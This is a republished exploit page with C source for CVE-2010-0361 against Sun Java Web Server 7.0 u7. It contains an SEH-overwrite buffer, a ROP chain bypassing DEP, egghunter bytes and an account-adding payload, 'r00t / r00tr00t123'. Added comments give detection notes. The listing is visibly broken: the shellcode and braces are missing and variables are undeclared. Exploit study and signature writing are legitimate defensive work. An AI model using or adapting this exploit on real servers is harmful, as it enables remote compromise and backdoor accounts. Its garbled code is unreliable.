Sun Java Web Server 7.0 u7 Exploit with DEP bypass
来源:dmc@deadbeef.co.uk 作者:dmc 发布时间:2010-07-09  

# Exploit Title: [SJWSexv2]
# Date: [09/07/2010]
# Author: [dmc]
# Software Link: [download link if available]
# Version: [7.0 u7]
# Tested on: [Windows XP SP3 - with and without DEP]
# CVE : [CVE-2010-0361]

/* Sun Java Web Server Exploit v2
 * Tested on:
 * Sun Java Web Server 7.0 update 7 - XP SP3
 * Ref: CVE-2010-0361
 * This exploit is capable of bypassing DEP.
 * In order to do this it uses ROP to invoke
 * SetProcessDEPPolicy().
 * Author: Dominic Chell <dmc@deadbeef.co.uk>
 * Date: 08/07/2010
 */

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

#define usage(){(void)fprintf(stderr, "SJWSexv2 vs Sun Java Web Server 7.0 u7\n(C) dmc <dmc@deadbeef.co.uk>\n\nUsage: sjwsex.exe [ip] [port] [directory]\nExample: sjwsex.exe 80 test\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}

// encoding the payloads in URL hex prevents it getting converted to unicode
// Defender notes on the constants below: every gadget is annotated as living in
// ns-httpd40.dll and the SetProcessDEPPolicy address is hard-coded for the
// tested build (XP SP3, which has no ASLR), so the chain only lines up on that
// exact module/OS layout; an ASLR-capable OS or a different build of the DLL
// invalidates these addresses. Because the request is URL-encoded, each 4-byte
// address travels on the wire as a 12-character "%XX%XX%XX%XX" text run — a
// network signature has to match the encoded text as sent, not the decoded bytes.
char seh[] = "%90%80%02%10"; // 0x10028090 :  # ADD ESP,700 # RETN    [Module : ns-httpd40.dll]
// SEH record overwrite value: a stack-pivot gadget per the annotation above.
char *nop = "%90"; // nop
// Egghunter stub (32 bytes once decoded). Per the naming and the `egg` tag below
// it scans process memory for the 8-byte marker and transfers control to what
// follows it — the page gives no disassembly, so that description is inferred.
char egghunter[] = "%66%81%CA%FF%0F%42%52%6A%02%58%CD%2E%3C%05%5A%74%EF%B8%77%30%30%74%8B%FA%AF%75%EA%AF%75%E7%FF%E7";
char *egg = "%77%30%30%74%77%30%30%74"; // w00tw00t
// NOTE(review): `deadbeef` is not referenced anywhere in the code visible on this page.
char *deadbeef = "%ef%be%ad%de";
// ROP chain: per the header comment it prepares registers so that PUSHAD # RETN
// ends up calling SetProcessDEPPolicy (whose address is popped into EBP) — the
// per-gadget annotations on each line are the author's and are kept verbatim.
char *ropayload = "%F2%C2%02%10" // 0x1002C2F2 :  # OR EAX,FFFFFFFF # POP EBX # RETN      [Module : ns-httpd40.dll]
    "%FF%FF%FF%FF" // put in to ebx
    "%4C%C1%02%10" // 0x1002C14C :  # INC EBX # XOR EAX,EAX # RETN  [Module : ns-httpd40.dll]
    "%E8%45%0D%10" // 0x100D45E8 :  # OR EAX,FFFFFFFF # POP EBP # RETN      [Module : ns-httpd40.dll]
    "%A4%22%86%7C" // 0x7C8622A4 SetProcessDEPPolicy, into EBP
    "%9D%31%08%10" // 0x1008319D :  # OR EAX,FFFFFFFF # POP EDI # RETN      [Module : ns-httpd40.dll]
    "%BF%13%01%10" // 0x100113BF :  # NOP # MOV EAX,DWORD PTR SS:[ESP+4] # MOV EAX,DWORD PTR DS:[EAX+14] # RETN       [Module : ns-httpd40.dll]
    "%BA%13%01%10" // 0x100113BA :  # POP ESI # RETN  [Module : ns-httpd40.dll]
    "%BF%13%01%10" // 0x100113BF :  # NOP # MOV EAX,DWORD PTR SS:[ESP+4] # MOV EAX,DWORD PTR DS:[EAX+14] # RETN       [Module : ns-httpd40.dll]
    "%0D%7C%0A%10"; // 0x100A7C0D :  # PUSHAD # RETN   [Module : ns-httpd40.dll]
// adduser r00t / r00tr00t123
// Host-level indicator: per the comment above (and the final message in main),
// the payload creates a local account named r00t — its appearance on a server
// running this product is a post-exploitation IoC. The byte string itself is
// absent from this copy of the page.
char shellcode[] =

int send_buffer(int ipaddr, int port, char *buffer)
 /* Sends `buffer` (NUL-terminated; length taken with strlen) over a TCP
  * connection to the target. Returns 0 on success; the error() macro returns
  * -1 on WSAStartup, socket or send() failure.
  *
  * NOTE(review): as reproduced on this page the function is incomplete — the
  * braces are gone, `s` and `server` are used without any visible declaration
  * or initialisation (lines lost in extraction), the WSAConnect result is
  * unchecked, and no closesocket() appears in the lines shown. Treat this as a
  * reference listing, not as something that builds.
  */
 struct fd_set mask;
 struct timeval timeout;
 struct sockaddr_in server;
 WSADATA info;
    if (WSAStartup(MAKEWORD(2,0), &info)) error("Unable to start WSA");

 if (s==INVALID_SOCKET) error("[*] socket error");

 WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);

   // The whole request is sent in one call; a short send() is not detected here.
   if (send(s,buffer,strlen(buffer),0)==SOCKET_ERROR) error("[*] error sending buffer\n");
   return 0;

int main(int argc, char *argv[])
 /* Entry point. argv[1] = target IP, argv[2] = port, argv[3] = directory (see
  * the usage() text above). Two request shapes are produced: a "GET /" whose
  * URI carries the egg tag plus shellcode, sent four times so the decoded
  * bytes are resident in the server process, then a single
  * "OPTIONS /<directory>/" whose URI holds padding, the ROP chain, the
  * egghunter, the NOP sled and the SEH overwrite.
  *
  * NOTE(review): the text on this page is not compilable as shown — the braces
  * are gone, `ptr` and `buffer` are used without any visible assignment, and
  * usage() is defined but never invoked on the argc < 4 path. Treat it as a
  * reference for understanding the traffic, not as a runnable program.
  *
  * Detection angle (grounded in the builders below): an OPTIONS request whose
  * URI decodes to several hundred 0x90 bytes followed by a run of 'B', contains
  * the fixed 4-byte ns-httpd40.dll gadget addresses, and ends with bare-LF line
  * endings ("\n\n" rather than "\r\n\r\n") is a high-signal IDS/WAF pattern.
  */
 char *verb="GET /";
 char *options="OPTIONS /";
 char *version=" HTTP/1.0";
 char *directory="";
 char *payload, *ptr, *buffer;
 char nopsled1[1510], nopsled2[190], padding[400], padding2[210];
 if(argc < 4)
  return 0;

 int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);
 directory = argv[3];
 fprintf(stderr, "SJWSexv2 vs Sun Java Web Server 7.0 u7\n(C) dmc <dmc@deadbeef.co.uk>\n\n");

 // Padding is sized against the directory length so the overwrite lands at a
 // constant offset (the "seh overwritten at 768" remark below) whatever the
 // directory argument is.
 int nopslen = 136 - strlen(directory);

 // 500 x "%90" (1500 encoded chars) — the large NOP sled after the egghunter.
 memset(nopsled1, 0x00, sizeof(nopsled1));
 for(int i=0;i<500;i++)
  strcat(nopsled1, nop);

 memset(padding, 0x00, sizeof(padding));
 for(int i=0;i<nopslen;i++)
  strcat(padding, nop);

 // 60 x "%90" — the small sled between the ROP chain and the egghunter.
 memset(nopsled2, 0x00, sizeof(nopsled2));
 for(int i=0;i<60;i++)
  strcat(nopsled2, nop);

 // 200 literal 'B' bytes trailing the SEH value.
 memset(padding2, 0x00, sizeof(padding2));
 for(int i=0; i<200; i++)
  padding2[i] = 'B';

 // build payload and place shellcode in memory
 payload = (char*)malloc(strlen(egg)+strlen(shellcode)+strlen(verb)+strlen(version)+2);
 // sizeof(payload) here is the pointer's width, not the malloc'd length.
 memset(payload, 0x00, sizeof(payload));
 memcpy(ptr, verb, strlen(verb));
 memcpy(ptr, egg, strlen(egg));
 memcpy(ptr, shellcode, strlen(shellcode));
 memcpy(ptr, version, strlen(version));
 memcpy(ptr, "\n\0", 2);

 // Four identical GET requests; return value of send_buffer() is ignored.
 fprintf(stderr, "%s\n", "[*] Filling memory with shellcode");
 for (int i=0; i<4; i++)
  send_buffer(ipaddr, port, payload);

 // build final buffer and overwrite seh
 int len=0;
 // seh overwritten at 768
 // +3 accounts for the "/" separator and the trailing "\n\n" (NUL excluded).
 len = strlen(options) + strlen(directory) + strlen(padding) + strlen(ropayload) + strlen(nopsled1);
 len = len + strlen(egghunter) + strlen(seh) + strlen(nopsled2) + strlen(padding2) + strlen(version) + 3;

 // Request layout, in order: OPTIONS /<dir>/ <padding> <rop> <sled2> <egghunter>
 // <sled1> <seh> <'B'*200> HTTP/1.0\n\n
 memset(buffer, 0x00, sizeof(buffer));
 memcpy(ptr, options, strlen(options));
 memcpy(ptr, directory, strlen(directory));
 memcpy(ptr, "/", 1);

 memcpy(ptr, padding, strlen(padding));

 memcpy(ptr, ropayload, strlen(ropayload));

 memcpy(ptr, nopsled2, strlen(nopsled2));

 memcpy(ptr, egghunter, strlen(egghunter));

 memcpy(ptr, nopsled1, strlen(nopsled1));

 memcpy(ptr, seh, strlen(seh));

 memcpy(ptr, padding2, strlen(padding2));

 memcpy(ptr, version, strlen(version));
 memcpy(ptr, "\n\n\0", 3);

 fprintf(stderr, "%s\n", "[*] Sending final buffer");
 send_buffer(ipaddr, port, buffer);
 // Host IoC: the account named here is what the payload creates on success.
 fprintf(stderr, "%s\n", "[*] Wait several minutes and connect with r00t / r00tr00t123");

 return 0;
